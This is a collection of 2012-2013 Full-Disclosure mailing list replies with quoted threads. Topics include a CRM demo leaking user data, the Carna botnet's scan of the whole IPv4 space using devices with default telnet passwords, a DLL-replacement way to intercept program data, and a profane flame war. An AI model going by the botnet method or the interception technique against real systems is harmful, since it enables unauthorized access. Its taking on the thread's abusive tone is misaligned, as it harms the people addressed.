Re: [Full-disclosure] Happy Holidays / Xmas Advisory
And it just so kindly tells you were everything is located, just in case you wanted to know Ex: http://demo.fatfreecrm.com/passwords/ I half expected to find password hashes but oh well that's life. It is a great hack me application when you can find random vulns simply by dicking around on your phone. On Dec 26, 2013 3:56 AM, PsychoBilly zpamh...@gmail.com wrote: [[ Henri Salo ]] @ [[ 24/12/2013 18:33 ]]-- On Tue, Dec 24, 2013 at 11:26:15AM +0100, joernchen wrote: A rather informal advisory on Fat Free CRM (http://fatfreecrm.com/): I created https://github.com/fatfreecrm/fat_free_crm/issues/300 for tracking. --- Henri Salo ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ I really like the full user db listing feature view-source:http://demo.fatfreecrm.com/login ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Abusing Windows 7 Recovery Process
Since when was full disk encryption standard in windows 7 let alone windows environments in general? Sure there are probably some but nonetheless On Jul 13, 2013 6:47 PM, Alex f...@daloo.de wrote: You didn't tell us how you cracked the full disc encryption. (There are ways around controls, but that is why we have multiple security layers.) Am 13. Juli 2013 22:49:11 schrieb valdis.kletni...@vt.edu: On Sat, 13 Jul 2013 22:13:38 +0300, Moshe Israel said: All secured/regulated systems as required by most certifications/standards/best practices. You're new in the industry, aren't you? :) The point you're missing is that the vast majority of computers aren't covered by said certifications and standards. And most of the certifications are merely a money grab by the auditors - the last numbers I found, something like 98% of breaches of systems that were covered by PCI were of systems that at the time of the breach were PCI-compliant. In other words, being PCI compliant didn't actually slow the attackers down one bit. You social engineer your way into the 5th office building you pass, pick a random PC on the 4th floor - I'll bet you that PC is probably *not* running sufficient monitoring to detect an intruder rebooting it and messing with the system. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Abusing Windows 7 Recovery Process
I am aware of this. However it is not the default and far from standard. Just saying encrypted disks are the exception and not the norm. On Jul 13, 2013 10:31 PM, Dennis E. Hamilton dennis.hamil...@acm.org wrote: Bit Locker full disk encryption has been available since Windows Vista. It was improved in Windows 7 and apparently even more for Windows 8. Not all hardware supported it originally. Recent Windows desktops and especially laptops should. - Dennis From: Full-Disclosure [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Gage Bystrom Sent: Saturday, July 13, 2013 03:58 PM To: Alex; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Abusing Windows 7 Recovery Process Since when was full disk encryption standard in windows 7 let alone windows environments in general? Sure there are probably some but nonetheless [ … ] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fw: Fw: Fw: Justice for Molly(copskillingcivillians)
On his behalf: no problem. On Mar 30, 2013 6:31 PM, Jerry dePriest jerr...@mc.net wrote: ** you sir, are the definaition of cad. thanks for keeping it going... - Original Message - *From:* Michael T mt2410...@gmail.com *To:* full-disclosure@lists.grok.org.uk *Sent:* Saturday, March 30, 2013 1:34 PM *Subject:* Re: [Full-disclosure] Fw: Fw: Fw: Justice for Molly(copskillingcivillians) Good lord, stop feeding the troll. Mike On Sat, Mar 30, 2013 at 5:06 AM, Philip Whitehouse phi...@whiuk.comwrote: So, wait, you're arguing against full disclosure of the critical vulnerabilities in your comments, on a list designed to allow full disclosure? Regards, Philip Whitehouse On 29 Mar 2013, at 15:54, Jerry dePriest jerr...@mc.net wrote: for 1 he posted it to the list instead of emailing me direct, Mr nosey pants. I see nothing has changed on this list except the level of integrity... - Original Message - *From:* Gage Bystrom themadichi...@gmail.com *To:* full-disclosure@lists.grok.org.uk *Sent:* Friday, March 29, 2013 10:51 AM *Subject:* Re: [Full-disclosure] Fw: Fw: Fw: Justice for Molly (copskillingcivillians) If you don't tell people what to post or not postwhy are you telling them to not post how they disagree with you on if this story should be posted to FD? Hum dee dum dum On Mar 29, 2013 5:28 AM, Jerry dePriest jerr...@mc.net wrote: ** 90% of the posts on here are illegal in some form or fashion. It's not a personal attack, it's full disclosure on how one can track info using http://archive.org/index.php no one looked at that aspect. To Johnny law dog: The software maker can over ride what you listed with their own disclaimer so thats bullshit. Ask Kevin Mitnik... Don't tell me what to post, I don't tell you what to post or what not to post... thanks for keeping this thread alive. You could have just stfu, but no I said sorry and dropped it, you're the ones keeping it going, THANKS! 'ssoles - Original Message - *From:* Jeffrey Walton noloa...@gmail.com *To:* Jerry dePriest jerr...@mc.net *Cc:* Full Disclosure List full-disclosure@lists.grok.org.uk *Sent:* Friday, March 29, 2013 7:10 AM *Subject:* Re: [Full-disclosure] Fw: Fw: Justice for Molly (cops killingcivillians) Go do illegal activities such as reverse engineering The DMCA (PUBLIC LAW 105–304) has exceptions for reverse engineering and security testing and evaluation. The RE exemption is in Section 1205 (f) REVERSE ENGINEERING). The STE exemption is in Section 1205 (i) SECURITY TESTING. Jeff On Fri, Mar 29, 2013 at 8:00 AM, Jerry dePriest jerr...@mc.net wrote: ** who made you the boss of FD? Ive seen similiar posts and bullshit like April fools jokes posing as 0-day and such. if you dont like it, move along. Go do illegal activities such as reverse engineering for 0-day exploits or holes in facebook so you can scare the rubes. man, try to do something good and I get blasted... Bryan, there is a short bridge waiting for you to take a long walk... By the looks of your myspace page you're anti social and a troll... We'll you got me. I forogt New Zeland is just another offshoot of the penal colony Austrailia used to be. You can't help it, it's in your genes... Spamming? UCE my mailings were not. They were informative, like this list is supposed to be. You liken my postings to the likes of Netdev and other assholes who truley UCE'd this list to death. btw this is the PERFECT place for this type of discussion. Who made you the fucking moderator of fd? You do a horrible job... I have been on this list since 2005... My postings are gold compared to the viri and other 'spolits people try to con people into. 1. Let's discuss how his facebook account was hacked along with others so no forensics are available. (Feds, gotta love em) 2. Let's discuss how her facebook account was hacked to say she took a bunch of pills THEN shot herself. 3. Let's discuss what a douchebag you are for downplaying something by putting it into the scope of a chain letter? That's confirmation you are in fact a true douchebag... FOAD Antisocial troll... Go remove your myspace page and maybe you wont look like such an ass, whole. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure
Re: [Full-disclosure] Fw: Fw: Fw: Justice for Molly (cops killingcivillians)
If you don't tell people what to post or not postwhy are you telling them to not post how they disagree with you on if this story should be posted to FD? Hum dee dum dum On Mar 29, 2013 5:28 AM, Jerry dePriest jerr...@mc.net wrote: ** 90% of the posts on here are illegal in some form or fashion. It's not a personal attack, it's full disclosure on how one can track info using http://archive.org/index.php no one looked at that aspect. To Johnny law dog: The software maker can over ride what you listed with their own disclaimer so thats bullshit. Ask Kevin Mitnik... Don't tell me what to post, I don't tell you what to post or what not to post... thanks for keeping this thread alive. You could have just stfu, but no I said sorry and dropped it, you're the ones keeping it going, THANKS! 'ssoles - Original Message - *From:* Jeffrey Walton noloa...@gmail.com *To:* Jerry dePriest jerr...@mc.net *Cc:* Full Disclosure List full-disclosure@lists.grok.org.uk *Sent:* Friday, March 29, 2013 7:10 AM *Subject:* Re: [Full-disclosure] Fw: Fw: Justice for Molly (cops killingcivillians) Go do illegal activities such as reverse engineering The DMCA (PUBLIC LAW 105–304) has exceptions for reverse engineering and security testing and evaluation. The RE exemption is in Section 1205 (f) REVERSE ENGINEERING). The STE exemption is in Section 1205 (i) SECURITY TESTING. Jeff On Fri, Mar 29, 2013 at 8:00 AM, Jerry dePriest jerr...@mc.net wrote: ** who made you the boss of FD? Ive seen similiar posts and bullshit like April fools jokes posing as 0-day and such. if you dont like it, move along. Go do illegal activities such as reverse engineering for 0-day exploits or holes in facebook so you can scare the rubes. man, try to do something good and I get blasted... Bryan, there is a short bridge waiting for you to take a long walk... By the looks of your myspace page you're anti social and a troll... We'll you got me. I forogt New Zeland is just another offshoot of the penal colony Austrailia used to be. You can't help it, it's in your genes... Spamming? UCE my mailings were not. They were informative, like this list is supposed to be. You liken my postings to the likes of Netdev and other assholes who truley UCE'd this list to death. btw this is the PERFECT place for this type of discussion. Who made you the fucking moderator of fd? You do a horrible job... I have been on this list since 2005... My postings are gold compared to the viri and other 'spolits people try to con people into. 1. Let's discuss how his facebook account was hacked along with others so no forensics are available. (Feds, gotta love em) 2. Let's discuss how her facebook account was hacked to say she took a bunch of pills THEN shot herself. 3. Let's discuss what a douchebag you are for downplaying something by putting it into the scope of a chain letter? That's confirmation you are in fact a true douchebag... FOAD Antisocial troll... Go remove your myspace page and maybe you wont look like such an ass, whole. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fw: petition to remove Aaron Swartz prosecutor
Keep in mind the largest part about the backlash against you is your constant over the top, borderline comical reaction to people criticising you. You keep freaking out more and more and yelling at random people its quite amusing. On Mar 29, 2013 8:20 AM, Jerry dePriest jerr...@mc.net wrote: ** I read the TOU and my topic is not political. It has to do with evidence and foresnics. Sorry you persons being obtuse couldn't pick up on this and just let it be. Better yet, why not offer info on how to gather info from archive sites that maybe be of use to everyone? No, you go out of your way to say i'm wrong, my post is wrong, etc. In this age of technology not one person asked about what type of evidence could be gleaned and ways to do it. I have been offline for health reasons and come back to see fd is going shit... It's like when Markus Ranum sold Blackice. A good product turned to crap by lusers... - Original Message - *From:* Steve Wray stevedw...@gmail.com *To:* Full Disclosure List full-disclosure@lists.grok.org.uk *Sent:* Friday, March 29, 2013 9:48 AM *Subject:* Re: [Full-disclosure] petition to remove Aaron Swartz prosecutor I'm not a moderator (OBVIOUSLY) but I'll just leave this here, from the list charter: quote Acceptable Content Any information pertaining to vulnerabilities is acceptable, for instance announcement and discussion thereof, exploit techniques and code, related tools and papers, and other useful information. Gratuitous advertisement, product placement, or self-promotion is forbidden. Disagreements, flames, arguments, and off-topic discussion should be taken off-list wherever possible. Humour is acceptable in moderation, providing it is inoffensive. Politics should be avoided at all costs. /quote I'm thinking mainly Self promotion and POLITICS... avoided... all costs Enough said? On 29 March 2013 21:34, Jeffrey Walton noloa...@gmail.com wrote: On Fri, Mar 29, 2013 at 9:05 AM, Jerry dePriest jerr...@mc.net wrote: and this is pertinent to the list? another asshole that psts to the list with bullshit (in my eyes) then you go off on me for what I think is important. It appears you did not have your bowl of Cheerio's this morning Who was the young lady? Perhaps a close friend or relative? Jeff - Original Message - From: Gary Baribault To: full-disclosure@lists.grok.org.uk Sent: Monday, January 14, 2013 3:46 PM Subject: Re: [Full-disclosure] petition to remove Aaron Swartz prosecutor I didn't know the gentleman, but have known some depressive people. There may have been other problems bothering him in his life, but spending a fortune on a lawyer to try and avoid 30 - 50 years in prison and the reputation that he would have if he ever got out is probable quite near the top of the list of things setting his mind frame and causing this unfortunate decision. The powers that be have blood on their hands and hopefully are having rather poor nights sleep these days. Personally I would be having trouble looking in the mirror for my daily shave. Gary Baribault On 01/14/2013 03:35 PM, valdis.kletni...@vt.edu wrote: On Mon, 14 Jan 2013 11:02:26 -0500, Jeffrey Walton said: On Mon, Jan 14, 2013 at 10:34 AM, richa...@fastmail.fm wrote: https://petitions.whitehouse.gov/petition/remove-united-states-district-attorney-carmen-ortiz-office-overreach-case-aaron-swartz/RQNrG1Ck Above link to remove this prosecutor needs to have signatures by February 11. Its unfortunate Schwartz committed suicide over the incident. From the fine article: On his blog, Swartz had written of his history of depression. Given that, and the fact that the article doesn't mention a suicide note stating Aaron's reasons, it's not entirely clear that he in fact committed suicide over the incident. It may have been one factor out of many. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fw: Fw: Fw: Justice for Molly (copskillingcivillians)
Personal habit when it comes to posting on lists that has nothing to do with integrity. On Mar 29, 2013 8:55 AM, Jerry dePriest jerr...@mc.net wrote: ** for 1 he posted it to the list instead of emailing me direct, Mr nosey pants. I see nothing has changed on this list except the level of integrity... - Original Message - *From:* Gage Bystrom themadichi...@gmail.com *To:* full-disclosure@lists.grok.org.uk *Sent:* Friday, March 29, 2013 10:51 AM *Subject:* Re: [Full-disclosure] Fw: Fw: Fw: Justice for Molly (copskillingcivillians) If you don't tell people what to post or not postwhy are you telling them to not post how they disagree with you on if this story should be posted to FD? Hum dee dum dum On Mar 29, 2013 5:28 AM, Jerry dePriest jerr...@mc.net wrote: ** 90% of the posts on here are illegal in some form or fashion. It's not a personal attack, it's full disclosure on how one can track info using http://archive.org/index.php no one looked at that aspect. To Johnny law dog: The software maker can over ride what you listed with their own disclaimer so thats bullshit. Ask Kevin Mitnik... Don't tell me what to post, I don't tell you what to post or what not to post... thanks for keeping this thread alive. You could have just stfu, but no I said sorry and dropped it, you're the ones keeping it going, THANKS! 'ssoles - Original Message - *From:* Jeffrey Walton noloa...@gmail.com *To:* Jerry dePriest jerr...@mc.net *Cc:* Full Disclosure List full-disclosure@lists.grok.org.uk *Sent:* Friday, March 29, 2013 7:10 AM *Subject:* Re: [Full-disclosure] Fw: Fw: Justice for Molly (cops killingcivillians) Go do illegal activities such as reverse engineering The DMCA (PUBLIC LAW 105–304) has exceptions for reverse engineering and security testing and evaluation. The RE exemption is in Section 1205 (f) REVERSE ENGINEERING). The STE exemption is in Section 1205 (i) SECURITY TESTING. Jeff On Fri, Mar 29, 2013 at 8:00 AM, Jerry dePriest jerr...@mc.net wrote: ** who made you the boss of FD? Ive seen similiar posts and bullshit like April fools jokes posing as 0-day and such. if you dont like it, move along. Go do illegal activities such as reverse engineering for 0-day exploits or holes in facebook so you can scare the rubes. man, try to do something good and I get blasted... Bryan, there is a short bridge waiting for you to take a long walk... By the looks of your myspace page you're anti social and a troll... We'll you got me. I forogt New Zeland is just another offshoot of the penal colony Austrailia used to be. You can't help it, it's in your genes... Spamming? UCE my mailings were not. They were informative, like this list is supposed to be. You liken my postings to the likes of Netdev and other assholes who truley UCE'd this list to death. btw this is the PERFECT place for this type of discussion. Who made you the fucking moderator of fd? You do a horrible job... I have been on this list since 2005... My postings are gold compared to the viri and other 'spolits people try to con people into. 1. Let's discuss how his facebook account was hacked along with others so no forensics are available. (Feds, gotta love em) 2. Let's discuss how her facebook account was hacked to say she took a bunch of pills THEN shot herself. 3. Let's discuss what a douchebag you are for downplaying something by putting it into the scope of a chain letter? That's confirmation you are in fact a true douchebag... FOAD Antisocial troll... Go remove your myspace page and maybe you wont look like such an ass, whole. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Port scanning /0 using insecure embedded devices
I think its simply a case of everyone more or less knew this was possible and quite easy to pull off, just no one publicly bothered to get around to doing it till now. Afterall its just a large mass of low hanging fruit compromised to gather data. I'm more impressed by how they aggragated said data together without leaving a nasty trail. Of course I'm giving them the benefit of the doubt that they covered their tracks reasonably or have some sort of means to not worry about law enforcement. On Mar 26, 2013 8:23 PM, Stefan Jon Silverman s...@sjsinc.com wrote: Was really surprised that outside of Vladis's comment on feeding the BlackHats this provoked no further discussion...w/in a few minutes of it arriving I had fired off a forward to several colleagues w/ the comment that it should provoke an interesting discussion here on the sheer number of compromised devices to accomplish his goaldead airoh well, sometimes sh*t happens and sometimes is doesn't... Until this ended up in an eNewsRag in my inbox today (good read): *The Dark Side of the Internet of Things* -- http://www.networkcomputing.com/next-generation-data-center/servers/the-dark-side-of-the-internet-of-things/240151608 Regards, Stefan ** *Stefan Jon Silverman*http://www.sjsinc.com/cgi-bin/DoRedirect?sig-google- Founder / President SJS Associates, N.A., Inc. A Technology Strategy Consultancy ** Cell *917 929 1668* *s...@sjsinc.com*s...@sjsinc.com eMail *www.sjsinc.com*http://www.sjsinc.com/?%20eMail%20Sig ** Aim/Skype/GoogleIM: *LazloInSF* Twitter/Yahoo: *sjs_sf* ** Weebles wobble but they don't fall down ** On 3/17/2013 4:54 PM, internet census wrote: - Internet Census 2012 - Port scanning /0 using insecure embedded devices - Carna Botnet - While playing around with the Nmap Scripting Engine we discovered an amazing number of open embedded devices on the Internet. Many of them are based on Linux and allow login to standard BusyBox with empty or default credentials. From March to December 2012 we used ~420 Thousand insecure embedded devices as a distributed port scanner to scan all IPv4 addresses. These scans include service probes for the most common ports, ICMP ping, reverse DNS and SYN scans. We analyzed some of the data to get an estimation of the IP address usage. All data gathered during our research is released into the public domain for further study. The full 9 TB dataset has been compressed to 565GB using ZPAQ and is available via BitTorrent. The dataset contains: - 52 billion ICMP ping probes - 10.5 billion reverse DNS records - 180 billion service probe records - 2.8 billion sync scan records for 660 million IPs with 71 billion ports tested - 80 million TCP/IP fingerprints - 75 million IP ID sequence records - 68 million traceroute records This project is, to our knowledge, the largest and most comprehensive IPv4 census ever. With a growing number of IPv6 hosts on the Internet, 2012 may have been the last time a census like this was possible. A full documention, including statistics and images, can be found on the project page. We hope other researchers will find the data we have collected useful and that this publication will help raise some awareness that, while everybody is talking about high class exploits and cyberwar, four simple stupid default telnet passwords can give you access to hundreds of thousands of consumer as well as tens of thousands of industrial devices all over the world. No devices were harmed during this experiment and our botnet has now ceased its activity. Project Page: http://internetcensus2012.bitbucket.org/ http://internetcensus2012.github.com/InternetCensus2012/ http://census2012.sourceforge.net/ Torrent MAGNET LINK: magnet:?xt=urn:btih:7e138693170629fa7835d52798be18ab2fb847fedn=InternetCensus2012tr=udp%3a%2f%2ftracker.openbittorrent.com%3a80% 2fannouncetr=udp%3a%2f%2ftracker.ccc.de%3a80%2fannouncetr=udp%3a%2f%2ftracker.publicbt.com%3a80%2fannounce ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter:
Re: [Full-disclosure] The World's Largest Hacker Database
I agree. I'll admit that its pretty interesting but I highly doubt that it even remotely compares with FBI databases and similar organizations. After all its little secret that they keep their eyes on certain communities and ergo it makes sense that they will take the time to build up information on individuals only well known in their own neck of the woods but not the rest of the internet at large. Especially with the liberty taken with the definition of hacker soo many unlisted people running large open source projects could easily count. I also find it amusing that often their fact section directly goes against the summary of the person, and the lack of details is annoying. For such impressive claims I woulda thought that the entries would be more similar to a dox, containing all the important public knowledge on a nick. Still for a public database its pretty interesting and served what I think is its real purpose in order to draw in visitors. On Jan 8, 2013 8:00 AM, Justin C. Klein Keane jus...@madirish.net wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I'm pretty sure that the FBI has details on a few more than the 700 records in this database. Good job finding college professor Matt Blaze, but you couldn't find Hack in the Box founder l33tdawg?!? I'm sure I could find a few more hackers that were overlooked. Justin C. Klein Keane a.k.a. Mad Irish http://www.MadIrish.net The PGP signature on this email can be verified using the public key at http://www.madirish.net/gpgkey On 01/07/2013 10:36 AM, scryptz0 SOLDIERX wrote: Infosec Institute made a write up on the largest public hacker database on the net that is rumored to be rivaled by the FBI. Check it out at http://resources.infosecinstitute.com/worlds-largest-public-hacker-database/ The SOLDIERX HDB is the world’s largest public hacker database on the net and is rumored to be rivaled only by the FBI’s hacker database. Their hacker database contains a list of programmers, developers, black hats, white hats, security researchers, fake ethical hackers, hacktivists, packet kiddies, click kiddies, script kiddies, security professionals, heroes of computer revolution (Hello Steven Levy), hardware hackers, ch1xors (oh yes! although some people believe that they are non-existent), game hackers, and those who have embraced and embodied the hacker culture. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) Comment: Using GnuPG with undefined - http://www.enigmail.net/ iPwEAQECAAYFAlDsKHQACgkQkSlsbLsN1gAqAwb/ZkT32B6ptR3J+5o/K/wLQFkp 9jU75G/HsWN/y7XMk3gGFRG6S+ekqqAexC4NGEBmhCsCRv5ya0VpxUcB+RlytXEw DjTDPY8UzneCLwxU6o0u9MvhEUQq7yehP3N7P8DpFq7ps+PbxhhxfRCH2T2UOjIq +RWPKvtC0gasivooC9fy63JNMkmqwoPoV821KaQWaAM17+eZBcUER4xCG+bMLVwi Gpj5VR0/C3cwz34J2JlY8OLE9A6+f7q4o56C+lFZjGiyfDxBfHURpfBG5w2chXjd KZL1isXhJsK01uh61Lo= =LJu9 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Competitively priced drop box for pentesters
Intern:Why is there an ethernet jack for that power strip? Mentoring Admin: Why I have no clue I didn't put it there, replace it and check it out Intern: Google says it's from some demyo company for pen testers Admin: Hardly covert, the consulting pen test team we hired this year must suck dick Intern: So much dick On Fri, Dec 21, 2012 at 10:59 AM, Almaz al...@demyo.com wrote: https://twitter.com/demyosec/status/282194259820548096 -- Almantas Kakareka, CISSP, GSNA, GSEC, CEH CTO Demyo, Inc. Miami, FL, USA Cell: +1 201 665 Desk: +1 786 203 3948 Email: al...@demyo.com Twitter: @DemyoSec Web: www.demyo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Multiple 0-days in Dark Comet RAT
That's because no one particularly cares that it is malware. Botnets, rootkits, rats, ect are all just as potentially vulnerable as any other software, except the impact is pretty low. Let's say someone was exploiting this in the wild. Realistically what are they accomplishing? Most of the time they'd just be jacking boxes from other people that already got in. Hardly a feat when chances are you could get in through the same methods the original guy did. On Oct 11, 2012 7:08 AM, valdis.kletni...@vt.edu wrote: On Wed, 10 Oct 2012 23:25:50 +0200, Pascal Ernster said: I suppose it turns into a 0 day when you post it on this mailing list and happen to be in the mood to put the vendor's marketing division on BCC. -1 day could be when you ask a friend to check your mail to this ML for major grammar errors before you post it. All this ranting about the meaning of a 0-day - and not one person has mentioned the fact that the vulnerability is in *malware*??!? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Council financial data at risk from internet hackers
tl;dr: A security audit found security holes and a year later: not all of the holes were fixed. On Sep 26, 2012 3:15 AM, Bit WAshor b1t.was...@ymail.com wrote: SENSITIVE financial data could be at risk after it was revealed that a council’s IT network could be open to outside attacks following an audit of its systems. The detailed look into IT systems at South Derbyshire District Council has highlighted several issues which could see the authority left open to external attack. The problem arose as a result of an interim audit report, undertaken by Grant Thornton, which highlighted key risk areas. Specialist vulnerability testing discovered a ‘number of issues which needed to be addressed’ in order to protect council computer systems and sensitive data. After the problem was highlighted in November 2011, the council set up an action plan. However, despite making progress, some problems such as weak or blank passwords on servers and issues with domain administrator credentials remain. The report stated: “We acknowledge that the council is working with suppliers to resolve some of the issues. “Without full resolution of issues raised in relation to external vulnerability testing, management cannot be assured that the council’s IT network and systems are secure from attacks. “A successful attack could interrupt net- works services and be used to access sensitive financial data.” The council stated: “The remaining issues are more complex to resolve and the resolutions could have implications for the relevant business process.” The authority revealed that the password problem was being addressed but changes could impact the working of software. A deadline of November has been set for the resolution of the problems, which were deemed a medium priority, meaning ‘action is required to address a significant deficiency’. The recommendations will be discussed at a meeting of the council’s audit sub committee at the Civic Offices, in Civic Way, Swadlincote, on September 26. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez without Consent
Uhh I had to update a Windows box just the other day and it didn't install any toolbars or anything like that. Might wanna start running a few scans.. On Sep 6, 2012 10:42 AM, Jeffrey Walton noloa...@gmail.com wrote: On Thu, Sep 6, 2012 at 1:26 PM, James Lay j...@slave-tothe-box.net wrote: On 2012-09-06 11:09, Jeffrey Walton wrote: The company that writes the worlds most insecure software [1,2,3] has figured out a way to further increase an attack surface. Adobe now includes additional warez in their updates without consent. The warez includes a browser and tools bar. The attached image is what I got when I agreed to update Adobe Flash because of recent security vulnerability fixes. It appears Adobe has become a whore to Google like Mozilla. +1 Adobe. [SNIP] Perhaps someone didn't uncheck the checkbox on download Fortunately, I still had the browser Windows open (that was opened by the update process): https://get3.adobe.com/flashplayer/download/?installer=Flash_Player_11_for_Internet_Explorer . No check boxes - only instructions to install. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] A modest proposal
for. There is no need to prevent reverse engineering. I thought that was clear enough: the point of the variation is that you make the attacker reverse engineer each copy separately. The attacker will get tired. It’s good to get responses like yours though; that is what I hoped might come out of the post. Glenn Everhart From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Gage Bystrom Sent: Thursday, July 19, 2012 9:44 PM To: Glenn and Mary Everhart; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] A modest proposal 1.) waste of a reference by no follow through :( shame shame 2.) The only real problem with that idea is that you'd be doing it wrong. As in what you are doing does not accomplish what you want it to do. Those polymorphic techniques are there to prevent identification, not necessarily to prevent hooking, code injection, and reverse engineering. You use completely different techniques for those. 3.) It wouldn't be hard to get around it. Just replace a dll or two with the functions you want to intercept and analyze the output. They couldn't care less how polymorphic your code is if it still needs to pass the juicy data to a library function. And in a lot of cases they are already doing this, so its highly possible that you could suddenly take an application a piece of malware was designed to harvest information from, make it all polymorphic, and the same old malware version could still mess with it. And yes, it would still he able to identify the application cause the end user needs to be able to identify it and the malware would just use whatever method the end user would to spot it for injection or what not. 3.) I will say, at least you're thinking, even if its flawed. On Jul 19, 2012 6:24 PM, Glenn and Mary Everhart everh...@gce.com wrote: Hello, FD... A thought occurred to me: Why not use the same kind of polymorphism and software metamorphism that is used by malware writers as a protective measure? If you have a piece of code that you don't want malware to be able to inspect, that might perhaps have some secrets in it or that you want not to be trivial to have some other code patch, why not arrange for that code to be different in form (but the same in function) with every copy? (For places that insist on code that must be signed, you might need to have only perhaps scores or hundreds of variants, and then make it clear that the signed code requirements were making the systems that have them LESS secure than those without. bwahahaha. grin.) There are many ways to achieve this kind of result. Many would result in somewhat larger executables or the like, or possibly larger data, but some of the methods don't even need access to source code. (I would suspect many systems like this will be clearest to those of us who have worked in assembly languages and the like over the years, but that is a bit beside the point.) If every copy of a program is laid out differently, and data gets moved around also from copy to copy, the job of the attacker would seem to get much harder. Glenn Everhart ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ This transmission may contain information that is privileged, confidential, legally privileged, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. Although this transmission and any attachments are believed to be free of any virus or other defect that might affect any computer system into which it is received and opened, it is the responsibility of the recipient to ensure that it is virus free and no responsibility is accepted by JPMorgan Chase Co., its subsidiaries and affiliates, as applicable, for any loss or damage arising in any way from its use. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format. Thank you. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] A modest proposal
